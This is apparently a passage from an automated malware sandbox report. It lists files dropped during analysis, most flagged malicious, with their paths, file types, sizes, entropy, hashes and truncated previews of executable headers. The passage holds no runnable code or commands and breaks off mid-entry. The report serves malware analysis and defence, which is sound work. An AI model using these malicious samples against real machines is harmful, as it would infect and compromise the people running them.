                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Sat Sep 21 11:48:41 2024, mtime=Sat Sep 21 11:48:41 2024, atime=Sat Sep 21 11:48:11 2024, length=4249600, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1249
                                                                                                                                                                                                                                        Entropy (8bit):4.910675452619441
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:238720681D4807CB2EDC7EC4AA40CDA1
                                                                                                                                                                                                                                        SHA1:AD258212C499EFC3B1A2129372EFBE21F28DBA06
                                                                                                                                                                                                                                        SHA-256:C66B19E8344D8CD045E39D7238B0FE9308AEE34211D65BB1C646CDD021A12D56
                                                                                                                                                                                                                                        SHA-512:A523F780B44B473B27F006351F94E227806869196E7C4DCEA689D5C3EDE10F49F9E64F7B855A59BA72171F8C469C88411FA86110F47908549095D18E2E77624B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:L..................F.... ....a.$....a.$.....?.$.....@.....................4.:..DG..Yr?.D..U..k0.&...&.......bBDj....G.y$...0...$.......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG5Y.e..........................=...A.p.p.D.a.t.a...B.P.1.....5Y.f..Local.<......EWsG5Y.f.........................Z.8.L.o.c.a.l.....N.1.....5Y.f..Temp..:......EWsG5Y.f..........................q..T.e.m.p.....f.1.....5Y.f..POWERE~1..N......5Y.f5Y.f.....2....................V...P.o.w.e.r.E.x.p.e.r.t.N.N.T.....r.2...@.5Y.f .POWERE~1.EXE..V......5Y.f5Y.f.....2....................R.P.P.o.w.e.r.E.x.p.e.r.t.N.N.T...e.x.e.......q...............-.......p............q=+.....C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exe....P.o.w.e.r.E.x.p.e.r.t.N.N.T.>.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.P.o.w.e.r.E.x.p.e.r.t.N.N.T.\.P.o.w.e.r.E.x.p.e.r.t.N.N.T...e.x.e.........|....I.J.H..K..:...`.......X.......580913...........hT..CrF.f4... .Z.E._c...,...
                                                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):418816
                                                                                                                                                                                                                                        Entropy (8bit):6.7434348766555265
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:2F59FBD6623872FBDC2F63D18023BFDA
                                                                                                                                                                                                                                        SHA1:A71FD212DC780EDD062584ACFE3FC28A8090D039
                                                                                                                                                                                                                                        SHA-256:0C50705ED7CFC68F11AECD4CEE0B808934D4957672AC0EA0615E9A1C31870A52
                                                                                                                                                                                                                                        SHA-512:BD2CAEB7E88B333B31A864B66FE7B14CDF86560B488AE2B911893A059E184E7A80F0EDE8423AC8C10DE2BCFF3F5A85D1477F0A2E74986066F69D636D159B62F8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M............f......f./....f...\...."..........f......f.+....f.,....Rich...........PE..L.....%d.................H..........~>.......`....@.........................................................................J..x..................................LK...............................*..@...............$............................text...jG.......H.................. ..`.data........`...Z...L..............@....rsrc..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):183943
                                                                                                                                                                                                                                        Entropy (8bit):7.998396320845189
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:E6BEADEF5F58C272397A49C9D5715641
                                                                                                                                                                                                                                        SHA1:C324EAA435785C9C1ECEF611A9D1CFE65A166314
                                                                                                                                                                                                                                        SHA-256:183DF35420C19334BAC8DDE9C9A581AB232215CA4D3393E5688F31E69F42290A
                                                                                                                                                                                                                                        SHA-512:4FB61EFA95ED3044370C7C9F766C47DF67415AE856C85F78F55009707738BCB58E815C3F2902FE925AEDD31A4C27EB8FF4519DB371B0C61FEBD472C26910347C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T..f.............................(... ...@....@.. ....................................`..................................(..S....@..............x=..(&...`......`'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......................................................................$..hII#MtzNi.T.............`...&g~....n~^..r.b..f.r.Ga.x.|....}.Ib....PL:d.6... ......:E$7....e.aW...!..m5..5@..7W...........H:....+.(g...\[.k.z5.b....yd.)8....]K.._.}oB$......<]....K..%...On..j...nA}.P^.f.6Z|.._*..XcsF^....O].CQ..w...*.K..ts........F...H...].?WT>"f.].*..v.......$_...Lm.?.AO[9....e.8.~.e.....]NH.[L7\C...I.{.|.A....\..F.L;M..CG.:..d..K>.....6"b..Ofy...u8...:.&.Qe7
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):415943
                                                                                                                                                                                                                                        Entropy (8bit):7.9904721611397775
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:D399F8ABCA97B04F273F04322E4378BE
                                                                                                                                                                                                                                        SHA1:C62B4FA298116B3DD6943E950C8DFF80BA8AC64C
                                                                                                                                                                                                                                        SHA-256:EEB12C473444D2ACDE8CB542B65CCFDB0E8551B95B59969FA531574283BA78C1
                                                                                                                                                                                                                                        SHA-512:7104CD7C79880DDE790E7B28DA423013F4C1D9A8E6D365F9B2B1E36FDE62003F6D2635C4EF7DA35B4C887BC8527FA47D949B7EF1128BE5318A69EC02BAF6FF07
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>..f.............................:... ...@....@.. ....................................`..................................:..S....@..............xO..(&...`......`9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................:......H........*...............................................................j....(.m........u..B...+..g....M.....D..g..%n.w..M..O....@...f...[a....`.3..y..\L..y...G.........8...n..E.up.flqh...:...1H.C.................i..]6*..NgV...F.....t.A...b..h...\........r...&.&*kM.....Pa.FG....-I.%...T....'.|z.A......Sh.../......F...@...F.&...l...s.....J..F....j..5.e7....O.h..-k..U.N..`.........v.....^....S..;v.^..?.!.ZQx..^..Sh.4 .^..\.@.....-b.7..?......7+8....1....T6.
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):423328
                                                                                                                                                                                                                                        Entropy (8bit):7.9889468260390535
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:A463E516041F4BC84F03BC8FE2B643DD
                                                                                                                                                                                                                                        SHA1:5A3EC50E94565671531E1CE66C2EE1D1A88A0E09
                                                                                                                                                                                                                                        SHA-256:68024EBC8676FEB8C4B480F5042A8FE8F108A88FC20FC6DBFC3CF92707F148B8
                                                                                                                                                                                                                                        SHA-512:5657068CF82679A6CC5636FE4F465834F9340EF0C48A35CA412988F50909922654291BED9178B8990EBA2430569E1EBECD45CAD119C5A524616C75187D4DABDE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2..f.............................:... ...@....@.. ....................................`..................................:..S....@..............xO..(&...`......`9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................:......H........*..............................................................p....C...~V...{..S..gi.~f..<......(.Q>;&.&...F+.&/.g..c^.,q.v...[0..BW.e.P}..........(.....D.(D.h]....2..1.P..3@K........0JX....r...yJ.&...g....A...G..R`...6..t....<40........9.. !G..W*.`..6 #..D..7.;.{...-..4...TQ.0Vs..U..!DU..).np...!..l.S...H......A.D_.d...N.15.ouP...r.G..;.$qt.y...I.'...'...]?......d.........s<;(.yd3..4.:..U. .......n.9....u-![...~p..e.8....n.Cn`..8.q...J.L..$F.
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):331640
                                                                                                                                                                                                                                        Entropy (8bit):7.987353721341769
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:E8E6CD9EC48FAFCCC174F7BF07D045E2
                                                                                                                                                                                                                                        SHA1:0DFCCF235DC62D2592F5062A1B9691043C14CC9E
                                                                                                                                                                                                                                        SHA-256:76B4E6A99335D5FFA35E15863B544BF2EC9ED76CC8320E1D3E2F521A27018D07
                                                                                                                                                                                                                                        SHA-512:33E6C097784B29D3CBA17B751B3E87EA9D583DBF19646897843471F96EFD88E9B64D529A5F2C9FA13B9EDAD5D7CCF8D454E496FC63F1B288C44FD8509E8C1459
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=..f............................^.... ........@.. .......................@............`.....................................S.......................x)... ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................@.......H...........................................................................6.....Z...9)..^........j...PtY.#..A.R.\...d.4..7.Z..&w.w|.5.':.T..*~...x....T...7M.w.Sa...Qp.R.t.u...qzD(&...4.. .:O.d....V[. c..l.prK.]..v....Y\_.{.....'..T.-f..av...w(H.n.]..gpj)...OKV.......q..Q..*y.P.!..Y;O.0.....@.y...t.".u...7n.B.=.......C^.=.Mi......4......b.~..t..d.......#......Xa`.I\.R!...'}>.}..X...J.v.__...n.....\..f.'>...}....."..j(..vFQC..'l..'7..p..:............
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1075200
                                                                                                                                                                                                                                        Entropy (8bit):7.828820550765554
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:8C8AF20BF6536903C1D042CEBEDE6475
                                                                                                                                                                                                                                        SHA1:8EF42ABC3AD478F6D8C17691FE4CC1975CA43684
                                                                                                                                                                                                                                        SHA-256:B15BDB0A4D7F265CF4ED7C46668F4CA247347CA2CE4A7689CB8DBB25863F294A
                                                                                                                                                                                                                                        SHA-512:8F68E5302D07FB74DDE0E42E0D370E1CB7C1D6B0372633FCFAAB95CD1D12F9786C4E44E71B3CC98EEEB60EA10F54497773C3B4AA58AFA5297FAD93A3F11097E0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..@...&.......^... ...`....@.. ...............................D....@..................................]..O....`..F#...........................]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc...F#...`...$...B..............@..@.reloc...............f..............@..B.................]......H........D...J..............`.............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r)..p~....o-...(......t.....+..*Vs....(/...t.........*..(0...*.0..........
                                                                                                                                                                                                                                        Process:C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1075200
                                                                                                                                                                                                                                        Entropy (8bit):7.828820550765554
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:8C8AF20BF6536903C1D042CEBEDE6475
                                                                                                                                                                                                                                        SHA1:8EF42ABC3AD478F6D8C17691FE4CC1975CA43684
                                                                                                                                                                                                                                        SHA-256:B15BDB0A4D7F265CF4ED7C46668F4CA247347CA2CE4A7689CB8DBB25863F294A
                                                                                                                                                                                                                                        SHA-512:8F68E5302D07FB74DDE0E42E0D370E1CB7C1D6B0372633FCFAAB95CD1D12F9786C4E44E71B3CC98EEEB60EA10F54497773C3B4AA58AFA5297FAD93A3F11097E0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..@...&.......^... ...`....@.. ...............................D....@..................................]..O....`..F#...........................]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc...F#...`...$...B..............@..@.reloc...............f..............@..B.................]......H........D...J..............`.............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r)..p~....o-...(......t.....+..*Vs....(/...t.........*..(0...*.0..........
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3037032
                                                                                                                                                                                                                                        Entropy (8bit):6.781602952551882
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:098E15E88E5332253356C78BADF8D479
                                                                                                                                                                                                                                        SHA1:D5AAEB94EC0D92BD9AA7D4B76860E9C25CF10EE2
                                                                                                                                                                                                                                        SHA-256:6B89CDFE0D3EBC90994EE564AAC9C88B0DF80F25720AEDADFF660A0D079AD0C9
                                                                                                                                                                                                                                        SHA-512:27E7480332F7F07916399D9515057750E43F42D68AEBA095C77AB76616F899F49269EC78738F10D39D6869F67FF4EF768C03BA52A649C652AFA9EE161F2E1892
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$......... ...N...N...N......N.`6....N...K...N.#i....N.#i...N...M...N...J..N...K..N...O...N..P5...N.i.O..N...O.:.N.i.K..N.i.N...N.l....N.......N.i.L...N.Rich..N.........................PE..L.....%`.................8...........$.......P....@...................................!...@..........................%.....T...\.... ...f...........>..h............)..T...................D*.......)..@............P...............................text....@.......8.................. ..`.rdata...0...P...(...<..............@..@.data............n...d..............@....tls................................@....gfids..............................@..@.rsrc....f... ...h..................@..@........................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3141632
                                                                                                                                                                                                                                        Entropy (8bit):7.172503458895126
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:1FEDF314D7C5ED06FF6833C9C8FE5441
                                                                                                                                                                                                                                        SHA1:AC0F8C841D197A3DB368A3C646D242541ECE144B
                                                                                                                                                                                                                                        SHA-256:279AF267D365013227156575DCF61B6977CE4051DD4632515BD224314CEA7C59
                                                                                                                                                                                                                                        SHA-512:6328A2828A77FDAC906710552842A584208066033119F62AE0E97DA88DB37C35C02D368B554E58030D949E2DAD19715BF351284332706D939F8C6754D4DC9242
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................)..........)).. ...@)...@.. .......................`0...........@..................................)).K....`)......................@0.....O)).............................................. ............... ..H............text.....).. ....)................. ..`.sdata.......@).......).............@....rsrc........`).......).............@..@.reloc.......@0......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22487040
                                                                                                                                                                                                                                        Entropy (8bit):5.272510082812899
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:CB3952F1852179348F8D2DB91760D03B
                                                                                                                                                                                                                                        SHA1:4D2C9D9B09226524868760263C873EDC664456A9
                                                                                                                                                                                                                                        SHA-256:A9EA40670A686E175CC8C32E3FC6BA92505379303D6524F149022490A2DDA181
                                                                                                                                                                                                                                        SHA-512:163006435A30B31FF0B079215EFC0CEDF6A624516AF1FFCCBC6144CFDB205B822029D523F28EC86E0391AF1B741771B860CF4D3492C87567A55F541A39C69D11
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$..h...W..,.............@..............................`......*W...`... ...................................... Z.N....0Z.X....pZ......pM..f...........`\..P..........................._M.(....................4Z.X............................text... .h.......h.................`.``.data....+....i..,....h.............@.`..rdata...-...@p......&p.............@.`@.pdata...f...pM..h...TM.............@.0@.xdata..`.....P.......P.............@.0@.bss.....+....P.......................`..edata..N.... Z.......P.............@.0@.idata..X....0Z.......P.............@.0..CRT....p....PZ.......P.............@.@..tls.........`Z.......P.............@.@..rsrc........pZ.......P.............@.0..reloc...P...`\..R....R.............@.0B................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):361336
                                                                                                                                                                                                                                        Entropy (8bit):7.9885937954241255
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:D687AF3B103399AA245807BB719878B7
                                                                                                                                                                                                                                        SHA1:C3D45032BFD13C7DC75F08E55CABA56D0A1D4A42
                                                                                                                                                                                                                                        SHA-256:CC7056857CEC7D81101AF02D79431F4E193090FEF7D505D1970D4B2846F385B9
                                                                                                                                                                                                                                        SHA-512:8482B42FB16963BDCC6BCE162F79F64E28BFA46977788DF2044A7A0E805E67D44991C6EF24E1DD45643C7F69ABC66DEB257F23E7680B25DA8C486DC5BA0FF978
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................P...........n... ........@.. ....................................`..................................n..S....................Z..x)..........`m............................................... ............... ..H............text....N... ...P.................. ..`.rsrc................R..............@..@.reloc...............X..............@..B.................n......H........^................................................................$....sp...k.Ta.....|.K..?wN...-..m..E...C.9..-#....f..=...5spJ......z.s.._4v.ZUO.w...b...ne.sR..v@sO.4.] ......V.L.....TV[.X.vF......|..hI*..$<gb...v-Cm<[6R...8..!m..........'.?j....W`JI..!k........,.O.<9..W...X..LEq.... !......Q..$.@....,99..~...%(...\..|B..#.a... ......w..ZV..9.k..F.Zl........[.O..t....Gz&..c..yk&.N..;........T.fh.]Z.%....).=...-.Ig..T....*1.!..z...E...9.....x.
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3143204
                                                                                                                                                                                                                                        Entropy (8bit):7.997368405690321
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:0A02550E0EA5490D4D80EE79661C99E1
                                                                                                                                                                                                                                        SHA1:167AD22FF6368C3DBC4D4EE71E4C3A2D39C6F5C1
                                                                                                                                                                                                                                        SHA-256:9471DD61FDCABDFFA51B0FB0BF3DE28E1B2B1C4277F5BF784484518FC67716B5
                                                                                                                                                                                                                                        SHA-512:61C36A653C4C59017AE54FECC51CA92C36CA13CF118B7212CFB86F5D1D8ECEE42ACD946835F62EC5D57C640C7A7983DE9B2F9AD1C6EBB5A8AB062A0337861EB3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):418816
                                                                                                                                                                                                                                        Entropy (8bit):6.7434348766555265
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:2F59FBD6623872FBDC2F63D18023BFDA
                                                                                                                                                                                                                                        SHA1:A71FD212DC780EDD062584ACFE3FC28A8090D039
                                                                                                                                                                                                                                        SHA-256:0C50705ED7CFC68F11AECD4CEE0B808934D4957672AC0EA0615E9A1C31870A52
                                                                                                                                                                                                                                        SHA-512:BD2CAEB7E88B333B31A864B66FE7B14CDF86560B488AE2B911893A059E184E7A80F0EDE8423AC8C10DE2BCFF3F5A85D1477F0A2E74986066F69D636D159B62F8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M............f......f./....f...\...."..........f......f.+....f.,....Rich...........PE..L.....%d.................H..........~>.......`....@.........................................................................J..x..................................LK...............................*..@...............$............................text...jG.......H.................. ..`.data........`...Z...L..............@....rsrc..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):11496960
                                                                                                                                                                                                                                        Entropy (8bit):7.95681767955623
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:D60D266E8FBDBD7794653ECF2ABA26ED
                                                                                                                                                                                                                                        SHA1:469ED7D853D590E90F05BDF77AF114B84C88DE2C
                                                                                                                                                                                                                                        SHA-256:D4DF1ABA83289161D578336E1B7B6DAF7269BB73ACC92BD9DFA2C262EBC6C4D2
                                                                                                                                                                                                                                        SHA-512:80DF5D568E34DFC086F546E8D076749E58A7230ED1AA33F3A5C9D966809BECADC9922317095032D6E6A7ECDFBFBCE02A72CC82513AB0D132C5FFA6C07682BD87
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....+.f..........#.................]p.........@.............................`............ .....................................................<....P......@...`*...........................................F..(.......8............... ............................text...6........................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0..p.-......................... ..`.text1..X...........................@....text2...`.......b..................`..h.rsrc........P.......h..............@..@........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6666862
                                                                                                                                                                                                                                        Entropy (8bit):6.624649438102188
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:8FB3610C4BA81A5A93666562E712740A
                                                                                                                                                                                                                                        SHA1:FB8B6774E490680C1E04494D101F6CED3B7BE816
                                                                                                                                                                                                                                        SHA-256:8F72E50FAC72D3C5880F79997F6CF38026B00D6F907BCD80C5D780CF92DB7158
                                                                                                                                                                                                                                        SHA-512:6A833782EB81204D420841ACC1CD0D5F03BCE00D9725D850E5EF83A5C39C084E7BD1285582531A4092565BE9FA8409A7CFBCC0B74A5CEFD6DFAF9D4E4F5FD5CB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}.f.t_..%.........#.@H...Z...f..........PH...@.................................).f....... .........................B......................................h ............................H....................................................text....>H......@H.................`.P`.data........PH......FH.............@.`..rdata..8....pH......`H.............@.`@/4............I.......H.............@.0@.bss....T.f...L.......................`..edata..B.............L.............@.0@.idata................L.............@.0..CRT....4.............L.............@.0..tls.................L.............@.0..reloc..h ......"....L.............@.0B/14...................Z.............@..B/29......... ........Z.............@..B/41.....XL.......N...|\.............@..B/55.....B.... ........\.............@..B/67.....T.............].............@.0B/80.....a....0........].
                                                                                                                                                                                                                                        Process:C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):976632104
                                                                                                                                                                                                                                        Entropy (8bit):0.04563192849725171
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:CD0A0C5A7305A1E9A9C9F8B609732DB1
                                                                                                                                                                                                                                        SHA1:E24EF707F3044865524ACF986401F4A8F60CC9EE
                                                                                                                                                                                                                                        SHA-256:9399ED901C69CFDA8B3E5FAB16A499FF927A3975AE5B1077C0A2C810D6193A81
                                                                                                                                                                                                                                        SHA-512:1C205C5697CA39DCE1AD5FC3EFE0D8E6E4B783B89A3DF8F33D5B97667338AC8134FC1E989F04550BD47B5A32ACED85A8CE245FAC7F84514C0CAC674A17089523
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$......... ...N...N...N......N.`6....N...K...N.#i....N.#i...N...M...N...J..N...K..N...O...N..P5...N.i.O..N...O.:.N.i.K..N.i.N...N.l....N.......N.i.L...N.Rich..N.........................PE..L.....%`.................8...........$.......P....@...................................!...@..........................%.....T...\.... ...f...........>..h............)..T...................D*.......)..@............P...............................text....@.......8.................. ..`.rdata...0...P...(...<..............@..@.data............n...d..............@....tls................................@....gfids..............................@..@.rsrc....f... ...h..................@..@........................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                        Category:dropped
